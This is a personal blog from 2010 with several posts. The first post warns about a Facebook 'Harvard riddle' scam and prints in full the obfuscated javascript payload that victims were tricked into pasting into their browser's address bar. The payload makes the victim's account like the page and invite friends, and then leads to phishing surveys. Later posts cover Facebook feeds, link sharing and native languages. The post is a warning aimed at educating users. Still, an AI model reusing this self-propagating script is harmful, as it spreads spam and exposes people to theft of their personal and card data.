About Me

Narendran C R
London, UK



Wednesday, April 28, 2010

Facebook XSS attack - Only 4% of harvard grads can solve this riddle...

Recently I saw that one of my friends "Liked" the page "Only 4% of harvard grads can solve this riddle..." on Facebook. He is one of my good friends whom I respect a lot, and I know he is not very active in sharing information on Facebook. Obviously I was tempted to visit the page; moreover, I like solving puzzles, and with a title like "Only 4% of Harvard grads"!!! no words to explain.


The first page had the question and I started reading... When I reached half of the question, I started thinking of various answers!!! Snow? Air? Storm? Fire?!!! Blah blah blah... and when I finished reading the question, the answers in my mind were contradicting each other. Maybe that is why only 4% of Harvard grads could solve this! I thought. Until now I had no second thoughts.

When I moved on to the second page it asked me to press a series of keys. I started feeling suspicious about it. First press and hold the "ctrl" key and then "c". Almost everyone would know that it is the shortcut to copy something, and I knew it would not work for me as I am using an Apple Mac. I just followed the instructions...

1. Press ctrl + c (copy something... but what the hell is it copying!!! I did not select anything)
2. Press alt + d (Haaa! this does not work on a Mac either. It is the go-to-the-address-bar command for Windows... I still don't know what is supposed to be copied, but I am now sure it is bogus)
3. Last step, ctrl + v and press enter (Ta da.... Ultimate goal reached..... I am 100% confident it is some sort of attack)

Now I was more curious to know what kind of attack it is. Immediately I switched over to my Windows machine, made sure that I was not logged in, and visited the page "Only 4% of harvard grads can solve this riddle...". As instructed I copied the content, but instead of pasting it into the address bar I used TextPad to analyse the content (typical software engineer ;p). I didn't want to spend much time interpreting it as I was in the middle of documenting my dissertation. Thinking smartly (:D if I don't say so myself, nobody will!!) I concluded that the javascript will post a message on your wall that you like the page, so your friends can see it and become victims :D. If anyone wants the script, see below.
/************** Javascript ******************************/
javascript:(
function()
{
    a='app112010525500764_jop';
    b='app112010525500764_jode';
    ifc='app112010525500764_ifc';
    ifo='app112010525500764_ifo';
    mw='app112010525500764_mwrapper';
    eval(function(p,a,c,k,e,r)
        {
            e=function(c)
            {
                return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
            };
            if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);
            k=[function(e){return r[e]}];
            e=function(){return'\\w+'};
            c=1};
            while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
            return p
        }
    ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
    d=U;
    d[e[2]](V)[e[1]][e[0]]=e[3];
    d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
    s=d[e[2]](e[6]);
    m=d[e[2]](e[7]);
    c=d[e[9]](e[8]);
    c[e[11]](e[10],I,I);
    s[e[12]](c);
    C(D(){W[e[13]]()},E);
    C(D(){X[e[16]](e[14],e[15])},E);
    C(D(){m[e[12]](c);
    d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);
    ',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B| true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))
}
)();
************************end of script**********************************

Wait... the attack is still not complete. The motive of this attack is not just getting visitors to the page. It has still not revealed the answer!!! In fact there is no answer to the question. It will ask you to take a survey and redirect you to different survey pages like "prizes .uk .com", "rewardstoday .co .uk" (intentionally left spaces so that you don't become a victim :p) where you will be asked for information like your email address, name, phone number etc. etc. and even your credit card number :D.

Anyway, there is no answer to the question, so you don't have to worry about thinking about it...

There are already about 87,223 victims and we don't really know how many of them gave out their personal information or credit card information!!! Each time I hit refresh it increases by at least 50!!! I realized the potential of social media...

Now why did I write this blog? Hoping that this might educate some people who are innocent and might become victims.

What can we do? Visit the page "Only 4% of harvard grads can solve this riddle...", scroll to the bottom and report the page, so that we help get these pages taken down.

Thank you very much for taking your time...

Monday, April 26, 2010

Is Facebook acting up? Or is the Like button so powerful?

A few days ago, I suddenly started getting news feeds from FunCage.com, which I never subscribed to. How the hell am I getting these news items? Never mind... the postings are funny and interesting.

Yesterday I started getting new feeds from "Thank you Pakistan for taking Sania Mirza, Now Please take Rakhi Sawant also :)". All I did was click the Like button on one of my friends' status updates. Is this Like button so powerful that we automatically get subscribed to these community pages?

Two days ago, when I opened my Facebook account, a message popped up saying that all the schools in my profile info will be shown as links. This looked interesting, as it makes it easier to know more about a friend on Facebook. At the same time, I saw a new notifications icon flashing. This is where I was surprised! A message which I had already deleted was back in my inbox. How is that possible? How am I getting news feeds which I didn't subscribe to? How is a message I deleted appearing again? Is this related to some new changes that they are pushing to Facebook? I don't know! Is Facebook acting up? I am confused! If you know the answer please let me know.

I realized one thing: we are so addicted to these social network sites and share personal information which might affect our privacy. Maybe we are not worried about it now, but we might become victims in future. So be wise, know your privacy, be aware of what you are doing and what the consequences are.

Whatever it is! I love these social networking sites... it's a lot of fun and informative as well. It is just how you use it. :D

Thursday, April 08, 2010

Stop Forwarding - Start Sharing

The email era of forwards has changed now.

I used to get many forwarded emails, and if I found one interesting I would forward it to my friends. I have always had this habit of spending a little extra time to organize things so that it helps me save time later. In the past I used to build email forward lists to share the emails that I receive. Later at some point I started creating groups, which seemed a lot easier for sharing relevant information with my friends.

Recently, I started sharing links instead of forwarding emails. This seems very convenient to me, but I still see many of my friends forwarding emails to share information, hence I thought I should write this blog to spread the word to my friends: stop forwarding emails and start sharing links.

Nowadays it costs us nothing to host files on the Internet; the only thing is to get started. I use the following services, which are free, and you guys can also use them wisely.

To create websites / web pages - blogger.com, weebly.com
To save and share documents online - googledocs, adrive
Social Networks - Orkut, Facebook, Twitter, Digg
Professional Network - LinkedIn
To upload video - Youtube
Live Videos - Ustream
eBooks - Gigapedia

You may think "Why should I do this?"
Many times I hesitated to share some information as it was going to cost me time to upload or download files and share the information. Now you can easily share information on the go using simple share tools.

You would have noticed on almost all sites nowadays the share links to many sites like Facebook, Twitter etc. You can use any of these share tools; for my convenience I have installed the Google toolbar, which allows me to share information by simply clicking on the share button.

This will neither flood your inbox nor eat up your time. Also, if you receive an email and feel it is worth sharing, please take a few minutes to upload it to the Internet and share the link, so that it reaches more people than your email network.

These are just my thoughts!!! It's up to you whether you want to spend a little extra time or not.

I have shared some of the common websites which I find useful. If you have found any websites very useful, please share them with me.

Thanks in advance.

Sunday, April 04, 2010

Thinking in Native Language

It was the most wonderful Easter I ever had. My dear friend Anvesh invited me to his house for lunch and promised me Hyderabadi Biriyani. After going to his home I realized that I was the one who had to cook the Biriyani! (just kidding, but I helped him in cooking).

Anyway, it was a warm welcome with parota and mutton gravy as a welcome snack ;) and he started cooking Biriyani. Later his neighbour uncle made an entry with his sister friend :) Uncle is a Pastor; he greeted me and continued his work. Meanwhile, Anvesh opened his laptop. Laptop while cooking! What would I expect? Good music to enjoy while cooking! Yes, he opened YouTube and started playing a video (I was expecting his favourite Vadivelu comedy). Ooppsssss, a video from vahrehvah.com (the fellow is only now learning how to make Biriyani), he started playing the recipe video. OMG $^%&*^($^*%^*& I yelled at him. Last time when he brought Biriyani to my house, he told me that he cooked it. Now the truth came out: it was his cousin who made the awesome Biriyani and this idiot took the credit. Eventually I had to jump in and help him, and finally it was a nice spicy Hyderabadi Biriyani!

After all, the Biriyani was ready (WE COOKED it Lol...) and we needed someone to try it, yes! Neighbour uncle :) We invited neighbour uncle, who should be in his 60s, and his friend, who should also be in her 60s. All we did was invite them; they ate to fill their stomachs and hearts, and it was nice to know that someone liked the Biriyani that we made :) but later came the thunder! Uncle started his preaching and surprisingly Aunt was talking more than Uncle. She is a Singapore Tamil settled in London, and when she came to know that I was from Chennai, she started talking a lot, starting from when she came here.... blah blah blah.... Finally, with my actions and gestures, I was able to convey that I had to leave and escaped from that place.

Now why did I want to blog this stupid story? One reason is to thank Anvesh for the beautiful lunch. Secondly, the lady's blah blah blah... she said that she had met many people who come for preaching and are comfortable reading the Bible in English despite the fact that their mother tongue is Tamil.

We had this small conversation... (Ooops, even I am not comfortable reading Tamil, I have to cover up!!!) (not that my English is so super either!!)
me: started off with the usual reasons, we studied in English medium and Tamil was just one subject.
Uncle: padded me saying that he finished his Masters in English Literature and so blah blah blah...
me: Tamil is confined to Tamil Nadu... we wanted to learn more, Internet blah blah....
lady: Why do you say that? I have seen many people using Tamil on computers!
me: (just to cover up) doing a Masters in Computers and we can't do much in our native language, so we have to choose some language which is globally accepted (English may not be globally accepted but what to do??? cover up cover up...)

Somehow covered up and escaped from the place.

Looking back at this I realised that I don't really know any of the languages properly (I don't know any of them decently) and also had these questions in mind.

1) What is the scope of our native languages like Tamil / Telugu?
Could be in their own states! But what about people who stay away from home? Who migrated to other countries?

2) How many people are learning native languages?

3) What can we do to protect them from extinction? (maybe this is too strong, but at least they are deteriorating)
Forcing people to study in the native language?
Benefits for learning the native language?
Educating people that education in the native language is good? Maybe not! Would I have reached this stage if I had my education in my native language? Maybe yes! Or maybe no! I don't know.

4) What can we do to make people stick to the local language?
Making everything available in local languages? Is it possible? Is Wikipedia available in all native languages? Can we write code in native languages? Can we write chemical formulas in native languages?
Blog in Tamil? (something that I could have done now... but why didn't I do it? I am not comfortable writing in Tamil, and not all my friends, whom I might expect to read this blog, know Tamil!!! (I can't write Tamil properly either! Not all my friends know Tamil)
Guys, try using this "type in tamil" tool, it's really cool :D
If this can be translated into any language I wouldn't mind blogging in Tamil!

5) Do we need to stick to the local language?
It's up to you...

This is just a thought I had in my mind today. If you want to discuss, you are always welcome. Comment below and we shall have an interesting discussion, and we can also see if we can do something good.

Thank you for reading this Mokka Blog :D